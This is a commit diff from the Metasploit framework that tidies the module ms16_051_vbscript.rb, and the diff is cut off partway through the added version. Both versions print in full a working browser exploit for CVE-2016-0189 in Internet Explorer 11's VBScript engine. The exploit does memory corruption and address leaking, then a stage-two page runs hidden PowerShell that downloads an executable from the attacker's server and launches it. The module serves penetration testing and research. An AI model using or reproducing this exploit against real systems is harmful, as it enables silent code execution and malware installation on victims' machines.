
msftidy cleanup

William Webb 3 years ago
parent
commit
ba0da52274
1 changed files with 496 additions and 494 deletions
  1. 496
    494
      modules/exploits/windows/browser/ms16_051_vbscript.rb

+ 496
- 494
modules/exploits/windows/browser/ms16_051_vbscript.rb View File

@@ -1,494 +1,496 @@
1
-##
2
-# This module requires Metasploit: http//metasploit.com/download
3
-# Current source: https://github.com/rapid7/metasploit-framework
4
-##
5
-
6
-require 'msf/core'
7
-
8
-class MetasploitModule < Msf::Exploit::Remote
9
-  Rank = NormalRanking
10
-
11
-  include Msf::Exploit::Remote::HttpServer
12
-  include Msf::Exploit::EXE
13
-
14
-  def initialize(info={})
15
-    super(update_info(info,
16
-      'Name'           => "template",
17
-      'Description'    => %q{
18
-        This module exploits the memory corruption vulnerability (CVE-2016-0189)
19
-        present in the VBScript engine of Internet Explorer 11.
20
-      },
21
-      'License'        => MSF_LICENSE,
22
-      'Author'         => [ 
23
-          'Theori',                                              # Original RE research and exploitation
24
-          'William Webb <william_webb[at]rapid7.com>'            # Metasploit module
25
-        ],
26
-      'Platform'       => 'win',
27
-      'BrowserRequirements' =>
28
-         {
29
-           :source => /script|headers/i,
30
-           :os_name => OperatingSystems::Match::WINDOWS,
31
-           :ua_name => HttpClients::IE,
32
-           :ua_ver => '11.0'
33
-         },
34
-      'Targets'        =>
35
-        [
36
-          [ 'Automatic', {} ],
37
-          [
38
-            'Windows 10 with IE 11',
39
-            {
40
-              'os_flavor' => '10',
41
-              'ua_name'   => 'MSIE',
42
-              'ua_ver'    => '11.0'
43
-            }
44
-          ]
45
-        ],
46
-      'References'     =>
47
-        [
48
-          [ 'CVE', '2016-0189' ],
49
-          [ 'MSB', 'MS16-051' ]
50
-        ],
51
-      'Arch'           => ARCH_X86_64,
52
-      'DefaultTarget'  => 0))
53
-  end
54
-
55
-  def setup
56
-    # @stage2html = Rex::Text.rand_text_alphanum(6)
57
-    @ieshell          = "#{Rex::Text.rand_text_alphanumeric(6)}"       # ieshell32.dll uri
58
-    @localsrv         = "#{Rex::Text.rand_text_alphanumeric(6)}"       # ielocalserver.dll uri
59
-    @pm_escape_html   = "#{Rex::Text.rand_text_alphanumeric(6)}"       # vbscipt_godmode.html
60
-    @payload_uri      = "#{Rex::Text.rand_text_alphanumeric(8)}"
61
-    @payload_exe      = "#{Rex::Text.rand_text_alpha(6)}.exe"
62
-    File.open(File.join( Msf::Config.data_directory, "exploits", "cve-2016-0189", "ieshell32.dll" ), "rb") { |f| @stage2dll = f.read }
63
-    File.open(File.join( Msf::Config.data_directory, "exploits", "cve-2016-0189", "ielocalserver.dll" ), "rb") { |f| @localserver = f.read }
64
-    super
65
-  end
66
-
67
-  def exploit_html(req_uri)
68
-    srvhost = datastore['SRVHOST']
69
-    srvport = datastore['SRVPORT']
70
-
71
-    template = <<-EOF
72
-    <html>
73
-    <head>
74
-    <meta http-equiv="x-ua-compatible" content="IE=10">
75
-    </head>
76
-    <body>
77
-
78
-        <script type="text/vbscript">
79
-            Dim downloadFiles
80
-            Dim cacheRegex
81
-            Dim cacheFiles(3)
82
-
83
-            Dim downloadState
84
-            Dim pinTime
85
-
86
-            Dim oFSO
87
-            Dim oWS
88
-            Dim shell
89
-
90
-            function FindFile(path, regexFile)
91
-                FindFile = ""
92
-                For Each f in oFSO.GetFolder(path).Files
93
-                    If regexFile.Test(f.Name) Then
94
-                        FindFile = f.Name
95
-                        Exit For
96
-                    End If
97
-                Next
98
-            end function
99
-
100
-            function SearchCache(path, regexFile)
101
-                SearchCache = ""
102
-                For Each fld in oFSO.GetFolder(path).SubFolders
103
-                    'If DateDiff("s", pinTime, fld.DateLastModified) >= 0 Then
104
-                        filename = FindFile(path & "\\" & fld.Name, regexFile)
105
-                        If filename <> "" Then
106
-                            SearchCache = path & "\\" & fld.Name & "\\" & filename
107
-                            Exit For
108
-                        End If
109
-                    'End If
110
-                Next
111
-            end function
112
-
113
-            function loaddll()
114
-                On Error Resume Next
115
-
116
-                Set wshSystemEnv = oWS.Environment("Process")
117
-                tmpDir = oFSO.GetSpecialFolder(2)
118
-
119
-                tmpSysDir = tmpDir & "\\System32"
120
-                tmpShellFile = tmpSysDir & "\\shell32.dll"
121
-                oFSO.CreateFolder(tmpSysDir)
122
-                oFSO.MoveFile cacheFiles(0), tmpShellFile
123
-
124
-                mydllFile = tmpDir & "\\" & downloadFiles(1)
125
-                oFSO.MoveFile cacheFiles(1), mydllFile
126
-                wshSystemEnv("MyDllPath") = mydllFile
127
-
128
-                If (UBound(downloadFiles) = 2) Then
129
-                    stage2File = tmpDir & "\\#{@pm_escape_html}.html"
130
-                    oFSO.MoveFile cacheFiles(2), stage2File
131
-                    wshSystemEnv("stage2file") = stage2File
132
-                End If
133
-
134
-                saveRoot = wshSystemEnv("SystemRoot")
135
-                wshSystemEnv("SaveSystemRoot") = saveRoot
136
-                wshSystemEnv("SystemRoot") = tmpDir
137
-                Set shell = CreateObject("Shell.Application")
138
-
139
-                If (UBound(downloadFiles) = 2) Then
140
-                    call tolocal()
141
-                End If
142
-            end function
143
-
144
-            Sub OnDownloadDone()
145
-                If InStr(userAgent, "NT 5.") > 0 Then
146
-                    cacheDir = oWS.ExpandEnvironmentStrings("%USERPROFILE%")
147
-                    cacheDir = cacheDir & "\\Local Settings\\Temporary Internet Files\\Low\\IE"
148
-                Else
149
-                    cacheDir = oWS.ExpandEnvironmentStrings("%LOCALAPPDATA%")
150
-                    cacheDir = cacheDir & "\\Microsoft\\Windows\\Temporary Internet Files\\Low\\IE"
151
-                End If
152
-
153
-                Set regexFile = new regexp
154
-                regexFile.Pattern = cacheRegex(downloadState)
155
-                cacheFiles(downloadState) = SearchCache(cacheDir, regexFile)
156
-                If cacheFiles(downloadState) = "" Then
157
-                    Exit Sub
158
-                End If
159
-
160
-                If downloadState = UBound(downloadFiles) Then
161
-                    loaddll()
162
-                Else
163
-                    downloadState = downloadState + 1
164
-                    DoDownload()
165
-                End If
166
-            End Sub
167
-
168
-            Sub DoDownload()
169
-                pinTime = Now
170
-                call getdll(downloadFiles(downloadState))
171
-            End Sub
172
-
173
-        Sub runshell()
174
-            downloadFiles = Array("#{@ieshell}.dll", "#{@localsrv}.dll", "#{@pm_escape_html}.html")
175
-            cacheRegex = Array("^#{@ieshell}\\[\\d\\].dll$", "^#{@localsrv}\\[\\d\\].dll$", "^#{@pm_escape_html}\\[\\d\\].htm$")
176
-            Set oFSO = CreateObject("Scripting.FileSystemObject")
177
-            Set oWS = CreateObject("WScript.Shell")
178
-            downloadState = 0
179
-            DoDownload()
180
-        End Sub
181
-
182
-        </script>
183
-
184
-        <script type="text/vbscript">
185
-            Dim bl
186
-            Dim plunge(32)
187
-            Dim y(32)
188
-            prefix = "%u4141%u4141"
189
-            d = prefix & "%u0016%u4141%u4141%u4141%u4242%u4242"
190
-            b = String(64000, "D")
191
-            c = d & b
192
-            x = UnEscape(c)
193
-
194
-            Class ArrayWrapper
195
-                Dim A
196
-
197
-                Private Sub Class_Initialize
198
-                    ReDim Preserve AA(1, 2000)
199
-                    A = AA
200
-                End Sub
201
-
202
-                Public Sub Resize()
203
-                    ReDim Preserve A(1, 1)
204
-                End Sub
205
-            End Class
206
-
207
-            Class Spray
208
-            End Class
209
-
210
-
211
-            Function getAddr (arg1, s)
212
-          bl = Null
213
-          Set bl = New ArrayWrapper
214
-
215
-          For i = 0 To 32
216
-            Set plunge(i) = s
217
-          Next
218
-
219
-                Set bl.A(arg1, 2) = s
220
-
221
-          Dim addr
222
-                Dim i
223
-                For i = 0 To 31
224
-                    If Asc(Mid(y(i), 3, 1)) = VarType(s) Then
225
-                        addr = strToInt(Mid(y(i), 3 + 4, 2))
226
-                    End If
227
-            y(i) = Null
228
-                Next
229
-
230
-          If addr = Null Then
231
-            document.location.href = document.location.href
232
-            Return
233
-          End If
234
-
235
-          getAddr = addr
236
-        End Function
237
-
238
-        Function leakMem (arg1, addr)
239
-          d = prefix & "%u0008%u4141%u4141%u4141"
240
-                c = d & intToStr(addr) & b
241
-                x = UnEscape(c)
242
-
243
-          bl = Null
244
-                Set bl = New ArrayWrapper
245
-
246
-                Dim o
247
-                o = bl.A(arg1, 2)
248
-
249
-          leakMem = o
250
-        End Function
251
-
252
-        Sub overwrite (arg1, addr)
253
-          d = prefix & "%u400C%u0000%u0000%u0000"
254
-                c = d & intToStr(addr) & b
255
-                x = UnEscape(c)
256
-
257
-          bl = Null
258
-                Set bl = New ArrayWrapper
259
-                bl.A(arg1, 2) = CSng(0)
260
-        End Sub
261
-
262
-            Function exploit (arg1)
263
-                Dim addr
264
-                Dim csession
265
-                Dim olescript
266
-                Dim mem
267
-
268
-          Set sp = New Spray
269
-          addr = getAddr(arg1, sp)
270
-          mem = leakMem(arg1, addr + 8)
271
-          csession = strToInt(Mid(mem, 3, 2))
272
-          mem = leakMem(arg1, csession + 4)
273
-          olescript = strToInt(Mid(mem, 1, 2))
274
-          overwrite arg1, olescript + &H174
275
-          runshell()
276
-
277
-        End Function
278
-
279
-            Function triggerBug
280
-                bl.Resize()
281
-
282
-                Dim i
283
-                For i = 0 To 32
284
-                    y(i) = Mid(x, 1, 24000)
285
-                Next
286
-            End Function
287
-        </script>
288
-
289
-        <script type="text/javascript">
290
-            var userAgent = navigator.userAgent;
291
-            var oReq;
292
-            function getdll(downloadFile)
293
-            {
294
-                oReq = new XMLHttpRequest();
295
-                oReq.open("GET", "http://#{srvhost}:#{srvport}#{req_uri}/"+downloadFile, true);
296
-                oReq.onreadystatechange = handler;
297
-                oReq.send();
298
-            }
299
-            function handler()
300
-            {
301
-                if (oReq.readyState == 4 && oReq.status == 200) {
302
-                    OnDownloadDone();
303
-                }
304
-            }
305
-            function tolocal()
306
-            {
307
-                location.href = "http://localhost:5555/#{@pm_escape_html}.html";
308
-            }
309
-            function strToInt(s)
310
-            {
311
-                return s.charCodeAt(0) | (s.charCodeAt(1) << 16);
312
-            }
313
-            function intToStr(x)
314
-            {
315
-                return String.fromCharCode(x & 0xffff) + String.fromCharCode(x >> 16);
316
-            }
317
-            var o;
318
-            o = {"valueOf": function () {
319
-                    triggerBug();
320
-                    return 1;
321
-                }};
322
-            setTimeout(function() {exploit(o);}, 50);
323
-        </script>
324
-    </body>
325
-    </html>
326
-        EOF
327
-
328
-    template 
329
-  end
330
-
331
-  def stage2_html(req_uri)
332
-
333
-    template = <<-EOF
334
-    <html>
335
-    <head>
336
-    <meta http-equiv="x-ua-compatible" content="IE=10">
337
-    </head>
338
-    <body>
339
-        <script type="text/vbscript">
340
-            Dim aw
341
-            Dim plunge(32)
342
-            Dim y(32)
343
-            prefix = "%u4141%u4141"
344
-            d = prefix & "%u0016%u4141%u4141%u4141%u4242%u4242"
345
-            b = String(64000, "D")
346
-            c = d & b
347
-            x = UnEscape(c)
348
-
349
-            Class ArrayWrapper
350
-                Dim A()
351
-                Private Sub Class_Initialize
352
-                    ReDim Preserve A(1, 2000)
353
-                End Sub
354
-
355
-                Public Sub Resize()
356
-                    ReDim Preserve A(1, 1)
357
-                End Sub
358
-            End Class
359
-
360
-            Class Dummy
361
-            End Class
362
-
363
-            Function getAddr (arg1, s)
364
-                aw = Null
365
-                Set aw = New ArrayWrapper
366
-
367
-                For i = 0 To 32
368
-                    Set plunge(i) = s
369
-                Next
370
-
371
-                Set aw.A(arg1, 2) = s
372
-
373
-                Dim addr
374
-                Dim i
375
-                For i = 0 To 31
376
-                    If Asc(Mid(y(i), 3, 1)) = VarType(s) Then
377
-                        addr = strToInt(Mid(y(i), 3 + 4, 2))
378
-                    End If
379
-                    y(i) = Null
380
-                Next
381
-
382
-                If addr = Null Then
383
-                    document.location.href = document.location.href
384
-                    Return
385
-                End If
386
-
387
-                getAddr = addr
388
-            End Function
389
-
390
-            Function leakMem (arg1, addr)
391
-                d = prefix & "%u0008%u4141%u4141%u4141"
392
-                c = d & intToStr(addr) & b
393
-                x = UnEscape(c)
394
-
395
-                aw = Null
396
-                Set aw = New ArrayWrapper
397
-
398
-                Dim o
399
-                o = aw.A(arg1, 2)
400
-
401
-                leakMem = o
402
-            End Function
403
-
404
-            Sub overwrite (arg1, addr)
405
-                d = prefix & "%u400C%u0000%u0000%u0000"
406
-                c = d & intToStr(addr) & b
407
-                x = UnEscape(c)
408
-
409
-                aw = Null
410
-                Set aw = New ArrayWrapper
411
-                aw.A(arg1, 2) = CSng(0)
412
-            End Sub
413
-
414
-            Function exploit (arg1)
415
-                Dim addr
416
-                Dim csession
417
-                Dim olescript
418
-                Dim mem
419
-
420
-                Set dm = New Dummy
421
-                addr = getAddr(arg1, dm)
422
-                mem = leakMem(arg1, addr + 8)
423
-                csession = strToInt(Mid(mem, 3, 2))
424
-                mem = leakMem(arg1, csession + 4)
425
-                olescript = strToInt(Mid(mem, 1, 2))
426
-                overwrite arg1, olescript + &H174
427
-
428
-                Set shObj = CreateObject("Wscript.shell")
429
-                shObj.Run("PowerShell -nologo -WindowStyle Hidden $d=$env:temp+'\\#{@payload_exe}';(New-Object System.Net.WebClient).DownloadFile('http://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{req_uri}/#{@payload_uri}',$d);Start-Process $d")
430
-                shObj.Run("%temp%\\#{@payload_exe}")
431
-
432
-            End Function
433
-
434
-            Function triggerBug
435
-                aw.Resize()
436
-
437
-                Dim i
438
-                For i = 0 To 32
439
-                    y(i) = Mid(x, 1, 24000)
440
-                Next
441
-            End Function
442
-        </script>
443
-
444
-        <script type="text/javascript">
445
-            function strToInt(s)
446
-            {
447
-                return s.charCodeAt(0) | (s.charCodeAt(1) << 16);
448
-            }
449
-            function intToStr(x)
450
-            {
451
-                return String.fromCharCode(x & 0xffff) + String.fromCharCode(x >> 16);
452
-            }
453
-            var o;
454
-            o = {"valueOf": function () {
455
-                    triggerBug();
456
-                    return 1;
457
-                }};
458
-            setTimeout(function() {exploit(o);}, 50);
459
-        </script>
460
-    </body>
461
-    </html>
462
-
463
-      EOF
464
-      template
465
-  end
466
-
467
-  def on_request_uri(cli, request)
468
-    # used for some debugging stuff 
469
-    ies = @ieshell
470
-    ls  = @localsrv
471
-    pm  = @pm_escape_html
472
-
473
-    print_status("Received request: #{request.uri}")
474
-      if request.uri =~ /.*#{ies}.*$/
475
-        print_status("Sending stage two DLL ...")
476
-        send_response(cli, @stage2dll, { 'Content-Type' => 'application/x-msdownload', 'Pragma' => 'no-cache', 'Cache-Control' => 'no-cache', 'Connection' => 'close' })
477
-      elsif request.uri =~ /.*#{ls}.*$/
478
-        print_status("Sending local server DLL ...")
479
-        send_response(cli, @localserver, { 'Content-Type' => 'application/x-msdownload', 'Pragma' => 'no-cache', 'Cache-Control' => 'no-cache', 'Connection' => 'close' })
480
-      elsif request.uri =~ /.*#{pm}.*$/
481
-        rq = "#{get_resource.chomp('/')}"
482
-        gm = stage2_html(rq)
483
-        send_response(cli, gm, { 'Content-Type' => 'text/html', 'Pragma' => 'no-cache', 'Cache-Control' => 'no-cache', 'Connection' => 'close' })
484
-      elsif request.uri =~ /.*#{@payload_uri}$/
485
-        return if ((payload = regenerate_payload(cli)) == nil)
486
-        print_status("Sending payload ...")
487
-        send_response(cli, generate_payload_exe({ :code => payload.encoded }), { 'Content-Type' => 'application/octet-stream', 'Connection' => 'close' })
488
-      else
489
-        print_status("Sending main page ..")
490
-        send_response(cli, exploit_html(request.uri))
491
-      end
492
-  end
493
-
494
-end
1
+##
2
+# This module requires Metasploit: http://metasploit.com/download
3
+# Current source: https://github.com/rapid7/metasploit-framework
4
+##
5
+
6
+require 'msf/core'
7
+
8
+class MetasploitModule < Msf::Exploit::Remote
9
+  Rank = NormalRanking
10
+
11
+  include Msf::Exploit::Remote::HttpServer
12
+  include Msf::Exploit::EXE
13
+
14
+  def initialize(info={})
15
+    super(update_info(info,
16
+      'Name'           => "Internet Explorer 11 VBScript Engine Memory Corruption",
17
+      'Description'    => %q{
18
+        This module exploits the memory corruption vulnerability (CVE-2016-0189)
19
+        present in the VBScript engine of Internet Explorer 11.
20
+      },
21
+      'License'        => MSF_LICENSE,
22
+      'Author'         => [
23
+          'Theori',                                              # Original RE research and exploitation
24
+          'William Webb <william_webb[at]rapid7.com>'            # Metasploit module
25
+        ],
26
+      'Platform'       => 'win',
27
+      'BrowserRequirements' =>
28
+         {
29
+           :source => /script|headers/i,
30
+           :os_name => OperatingSystems::Match::WINDOWS,
31
+           :ua_name => HttpClients::IE,
32
+           :ua_ver => '11.0'
33
+         },
34
+      'Targets'        =>
35
+        [
36
+          [ 'Automatic', {} ],
37
+          [
38
+            'Windows 10 with IE 11',
39
+            {
40
+              'os_flavor' => '10',
41
+              'ua_name'   => 'MSIE',
42
+              'ua_ver'    => '11.0'
43
+            }
44
+          ]
45
+        ],
46
+      'References'     =>
47
+        [
48
+          [ 'CVE', '2016-0189' ],
49
+          [ 'MSB', 'MS16-051' ]
50
+        ],
51
+      'Arch'           => ARCH_X86_64,
52
+      'DisclosureDate' => "May 10 2016",
53
+      'DefaultTarget'  => 0))
54
+  end
55
+
56
+  def setup
57
+    # @stage2html = Rex::Text.rand_text_alphanum(6)
58
+    @ieshell          = "#{Rex::Text.rand_text_alphanumeric(6)}"       # ieshell32.dll uri
59
+    @localsrv         = "#{Rex::Text.rand_text_alphanumeric(6)}"       # ielocalserver.dll uri
60
+    @pm_escape_html   = "#{Rex::Text.rand_text_alphanumeric(6)}"       # vbscipt_godmode.html
61
+    @payload_uri      = "#{Rex::Text.rand_text_alphanumeric(8)}"
62
+    @payload_exe      = "#{Rex::Text.rand_text_alpha(6)}.exe"
63
+    File.open(File.join( Msf::Config.data_directory, "exploits", "cve-2016-0189", "ieshell32.dll" ), "rb") { |f| @stage2dll = f.read }
64
+    File.open(File.join( Msf::Config.data_directory, "exploits", "cve-2016-0189", "ielocalserver.dll" ), "rb") { |f| @localserver = f.read }
65
+    super
66
+  end
67
+
68
+  def exploit_html(req_uri)
69
+    srvhost = datastore['SRVHOST']
70
+    srvport = datastore['SRVPORT']
71
+
72
+    template = <<-EOF
73
+    <html>
74
+    <head>
75
+    <meta http-equiv="x-ua-compatible" content="IE=10">
76
+    </head>
77
+    <body>
78
+
79
+        <script type="text/vbscript">
80
+            Dim downloadFiles
81
+            Dim cacheRegex
82
+            Dim cacheFiles(3)
83
+
84
+            Dim downloadState
85
+            Dim pinTime
86
+
87
+            Dim oFSO
88
+            Dim oWS
89
+            Dim shell
90
+
91
+            function FindFile(path, regexFile)
92
+                FindFile = ""
93
+                For Each f in oFSO.GetFolder(path).Files
94
+                    If regexFile.Test(f.Name) Then
95
+                        FindFile = f.Name
96
+                        Exit For
97
+                    End If
98
+                Next
99
+            end function
100
+
101
+            function SearchCache(path, regexFile)
102
+                SearchCache = ""
103
+                For Each fld in oFSO.GetFolder(path).SubFolders
104
+                    'If DateDiff("s", pinTime, fld.DateLastModified) >= 0 Then
105
+                        filename = FindFile(path & "\\" & fld.Name, regexFile)
106
+                        If filename <> "" Then
107
+                            SearchCache = path & "\\" & fld.Name & "\\" & filename
108
+                            Exit For
109
+                        End If
110
+                    'End If
111
+                Next
112
+            end function
113
+
114
+            function loaddll()
115
+                On Error Resume Next
116
+
117
+                Set wshSystemEnv = oWS.Environment("Process")
118
+                tmpDir = oFSO.GetSpecialFolder(2)
119
+
120
+                tmpSysDir = tmpDir & "\\System32"
121
+                tmpShellFile = tmpSysDir & "\\shell32.dll"
122
+                oFSO.CreateFolder(tmpSysDir)
123
+                oFSO.MoveFile cacheFiles(0), tmpShellFile
124
+
125
+                mydllFile = tmpDir & "\\" & downloadFiles(1)
126
+                oFSO.MoveFile cacheFiles(1), mydllFile
127
+                wshSystemEnv("MyDllPath") = mydllFile
128
+
129
+                If (UBound(downloadFiles) = 2) Then
130
+                    stage2File = tmpDir & "\\#{@pm_escape_html}.html"
131
+                    oFSO.MoveFile cacheFiles(2), stage2File
132
+                    wshSystemEnv("stage2file") = stage2File
133
+                End If
134
+
135
+                saveRoot = wshSystemEnv("SystemRoot")
136
+                wshSystemEnv("SaveSystemRoot") = saveRoot
137
+                wshSystemEnv("SystemRoot") = tmpDir
138
+                Set shell = CreateObject("Shell.Application")
139
+
140
+                If (UBound(downloadFiles) = 2) Then
141
+                    call tolocal()
142
+                End If
143
+            end function
144
+
145
+            Sub OnDownloadDone()
146
+                If InStr(userAgent, "NT 5.") > 0 Then
147
+                    cacheDir = oWS.ExpandEnvironmentStrings("%USERPROFILE%")
148
+                    cacheDir = cacheDir & "\\Local Settings\\Temporary Internet Files\\Low\\IE"
149
+                Else
150
+                    cacheDir = oWS.ExpandEnvironmentStrings("%LOCALAPPDATA%")
151
+                    cacheDir = cacheDir & "\\Microsoft\\Windows\\Temporary Internet Files\\Low\\IE"
152
+                End If
153
+
154
+                Set regexFile = new regexp
155
+                regexFile.Pattern = cacheRegex(downloadState)
156
+                cacheFiles(downloadState) = SearchCache(cacheDir, regexFile)
157
+                If cacheFiles(downloadState) = "" Then
158
+                    Exit Sub
159
+                End If
160
+
161
+                If downloadState = UBound(downloadFiles) Then
162
+                    loaddll()
163
+                Else
164
+                    downloadState = downloadState + 1
165
+                    DoDownload()
166
+                End If
167
+            End Sub
168
+
169
+            Sub DoDownload()
170
+                pinTime = Now
171
+                call getdll(downloadFiles(downloadState))
172
+            End Sub
173
+
174
+        Sub runshell()
175
+            downloadFiles = Array("#{@ieshell}.dll", "#{@localsrv}.dll", "#{@pm_escape_html}.html")
176
+            cacheRegex = Array("^#{@ieshell}\\[\\d\\].dll$", "^#{@localsrv}\\[\\d\\].dll$", "^#{@pm_escape_html}\\[\\d\\].htm$")
177
+            Set oFSO = CreateObject("Scripting.FileSystemObject")
178
+            Set oWS = CreateObject("WScript.Shell")
179
+            downloadState = 0
180
+            DoDownload()
181
+        End Sub
182
+
183
+        </script>
184
+
185
+        <script type="text/vbscript">
186
+            Dim bl
187
+            Dim plunge(32)
188
+            Dim y(32)
189
+            prefix = "%u4141%u4141"
190
+            d = prefix & "%u0016%u4141%u4141%u4141%u4242%u4242"
191
+            b = String(64000, "D")
192
+            c = d & b
193
+            x = UnEscape(c)
194
+
195
+            Class ArrayWrapper
196
+                Dim A
197
+
198
+                Private Sub Class_Initialize
199
+                    ReDim Preserve AA(1, 2000)
200
+                    A = AA
201
+                End Sub
202
+
203
+                Public Sub Resize()
204
+                    ReDim Preserve A(1, 1)
205
+                End Sub
206
+            End Class
207
+
208
+            Class Spray
209
+            End Class
210
+
211
+
212
+            Function getAddr (arg1, s)
213
+          bl = Null
214
+          Set bl = New ArrayWrapper
215
+
216
+          For i = 0 To 32
217
+            Set plunge(i) = s
218
+          Next
219
+
220
+                Set bl.A(arg1, 2) = s
221
+
222
+          Dim addr
223
+                Dim i
224
+                For i = 0 To 31
225
+                    If Asc(Mid(y(i), 3, 1)) = VarType(s) Then
226
+                        addr = strToInt(Mid(y(i), 3 + 4, 2))
227
+                    End If
228
+            y(i) = Null
229
+                Next
230
+
231
+          If addr = Null Then
232
+            document.location.href = document.location.href
233
+            Return
234
+          End If
235
+
236
+          getAddr = addr
237
+        End Function
238
+
239
+        Function leakMem (arg1, addr)
240
+          d = prefix & "%u0008%u4141%u4141%u4141"
241
+                c = d & intToStr(addr) & b
242
+                x = UnEscape(c)
243
+
244
+          bl = Null
245
+                Set bl = New ArrayWrapper
246
+
247
+                Dim o
248
+                o = bl.A(arg1, 2)
249
+
250
+          leakMem = o
251
+        End Function
252
+
253
+        Sub overwrite (arg1, addr)
254
+          d = prefix & "%u400C%u0000%u0000%u0000"
255
+                c = d & intToStr(addr) & b
256
+                x = UnEscape(c)
257
+
258
+          bl = Null
259
+                Set bl = New ArrayWrapper
260
+                bl.A(arg1, 2) = CSng(0)
261
+        End Sub
262
+
263
+            Function exploit (arg1)
264
+                Dim addr
265
+                Dim csession
266
+                Dim olescript
267
+                Dim mem
268
+
269
+          Set sp = New Spray
270
+          addr = getAddr(arg1, sp)
271
+          mem = leakMem(arg1, addr + 8)
272
+          csession = strToInt(Mid(mem, 3, 2))
273
+          mem = leakMem(arg1, csession + 4)
274
+          olescript = strToInt(Mid(mem, 1, 2))
275
+          overwrite arg1, olescript + &H174
276
+          runshell()
277
+
278
+        End Function
279
+
280
+            Function triggerBug
281
+                bl.Resize()
282
+
283
+                Dim i
284
+                For i = 0 To 32
285
+                    y(i) = Mid(x, 1, 24000)
286
+                Next
287
+            End Function
288
+        </script>
289
+
290
+        <script type="text/javascript">
291
+            var userAgent = navigator.userAgent;
292
+            var oReq;
293
+            function getdll(downloadFile)
294
+            {
295
+                oReq = new XMLHttpRequest();
296
+                oReq.open("GET", "http://#{srvhost}:#{srvport}#{req_uri}/"+downloadFile, true);
297
+                oReq.onreadystatechange = handler;
298
+                oReq.send();
299
+            }
300
+            function handler()
301
+            {
302
+                if (oReq.readyState == 4 && oReq.status == 200) {
303
+                    OnDownloadDone();
304
+                }
305
+            }
306
+            function tolocal()
307
+            {
308
+                location.href = "http://localhost:5555/#{@pm_escape_html}.html";
309
+            }
310
+            function strToInt(s)
311
+            {
312
+                return s.charCodeAt(0) | (s.charCodeAt(1) << 16);
313
+            }
314
+            function intToStr(x)
315
+            {
316
+                return String.fromCharCode(x & 0xffff) + String.fromCharCode(x >> 16);
317
+            }
318
+            var o;
319
+            o = {"valueOf": function () {
320
+                    triggerBug();
321
+                    return 1;
322
+                }};
323
+            setTimeout(function() {exploit(o);}, 50);
324
+        </script>
325
+    </body>
326
+    </html>
327
+        EOF
328
+
329
+    template
330
+  end
331
+
332
+  def stage2_html(req_uri)
333
+
334
+    template = <<-EOF
335
+    <html>
336
+    <head>
337
+    <meta http-equiv="x-ua-compatible" content="IE=10">
338
+    </head>
339
+    <body>
340
+        <script type="text/vbscript">
341
+            Dim aw
342
+            Dim plunge(32)
343
+            Dim y(32)
344
+            prefix = "%u4141%u4141"
345
+            d = prefix & "%u0016%u4141%u4141%u4141%u4242%u4242"
346
+            b = String(64000, "D")
347
+            c = d & b
348
+            x = UnEscape(c)
349
+
350
+            Class ArrayWrapper
351
+                Dim A()
352
+                Private Sub Class_Initialize
353
+                    ReDim Preserve A(1, 2000)
354
+                End Sub
355
+
356
+                Public Sub Resize()
357
+                    ReDim Preserve A(1, 1)
358
+                End Sub
359
+            End Class
360
+
361
+            Class Dummy
362
+            End Class
363
+
364
+            Function getAddr (arg1, s)
365
+                aw = Null
366
+                Set aw = New ArrayWrapper
367
+
368
+                For i = 0 To 32
369
+                    Set plunge(i) = s
370
+                Next
371
+
372
+                Set aw.A(arg1, 2) = s
373
+
374
+                Dim addr
375
+                Dim i
376
+                For i = 0 To 31
377
+                    If Asc(Mid(y(i), 3, 1)) = VarType(s) Then
378
+                        addr = strToInt(Mid(y(i), 3 + 4, 2))
379
+                    End If
380
+                    y(i) = Null
381
+                Next
382
+
383
+                If addr = Null Then
384
+                    document.location.href = document.location.href
385
+                    Return
386
+                End If
387
+
388
+                getAddr = addr
389
+            End Function
390
+
391
+            Function leakMem (arg1, addr)
392
+                d = prefix & "%u0008%u4141%u4141%u4141"
393
+                c = d & intToStr(addr) & b
394
+                x = UnEscape(c)
395
+
396
+                aw = Null
397
+                Set aw = New ArrayWrapper
398
+
399
+                Dim o
400
+                o = aw.A(arg1, 2)
401
+
402
+                leakMem = o
403
+            End Function
404
+
405
+            Sub overwrite (arg1, addr)
406
+                d = prefix & "%u400C%u0000%u0000%u0000"
407
+                c = d & intToStr(addr) & b
408
+                x = UnEscape(c)
409
+
410
+                aw = Null
411
+                Set aw = New ArrayWrapper
412
+                aw.A(arg1, 2) = CSng(0)
413
+            End Sub
414
+
415
+            Function exploit (arg1)
416
+                Dim addr
417
+                Dim csession
418
+                Dim olescript
419
+                Dim mem
420
+
421
+                Set dm = New Dummy
422
+                addr = getAddr(arg1, dm)
423
+                mem = leakMem(arg1, addr + 8)
424
+                csession = strToInt(Mid(mem, 3, 2))
425
+                mem = leakMem(arg1, csession + 4)
426
+                olescript = strToInt(Mid(mem, 1, 2))
427
+                overwrite arg1, olescript + &H174
428
+
429
+                Set shObj = CreateObject("Wscript.shell")
430
+                shObj.Run("PowerShell -nologo -WindowStyle Hidden $d=$env:temp+'\\#{@payload_exe}';(New-Object System.Net.WebClient).DownloadFile('http://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{req_uri}/#{@payload_uri}',$d);Start-Process $d")
431
+                shObj.Run("%temp%\\#{@payload_exe}")
432
+
433
+            End Function
434
+
435
+            Function triggerBug
436
+                aw.Resize()
437
+
438
+                Dim i
439
+                For i = 0 To 32
440
+                    y(i) = Mid(x, 1, 24000)
441
+                Next
442
+            End Function
443
+        </script>
444
+
445
+        <script type="text/javascript">
446
+            function strToInt(s)
447
+            {
448
+                return s.charCodeAt(0) | (s.charCodeAt(1) << 16);
449
+            }
450
+            function intToStr(x)
451
+            {
452
+                return String.fromCharCode(x & 0xffff) + String.fromCharCode(x >> 16);
453
+            }
454
+            var o;
455
+            o = {"valueOf": function () {
456
+                    triggerBug();
457
+                    return 1;
458
+                }};
459
+            setTimeout(function() {exploit(o);}, 50);
460
+        </script>
461
+    </body>
462
+    </html>
463
+
464
+      EOF
465
+      template
466
+  end
467
+
468
+  def on_request_uri(cli, request)
469
+    # used for some debugging stuff
470
+    ies = @ieshell
471
+    ls  = @localsrv
472
+    pm  = @pm_escape_html
473
+
474
+    print_status("Received request: #{request.uri}")
475
+      if request.uri =~ /.*#{ies}.*$/
476
+        print_status("Sending stage two DLL ...")
477
+        send_response(cli, @stage2dll, { 'Content-Type' => 'application/x-msdownload', 'Pragma' => 'no-cache', 'Cache-Control' => 'no-cache', 'Connection' => 'close' })
478
+      elsif request.uri =~ /.*#{ls}.*$/
479
+        print_status("Sending local server DLL ...")
480
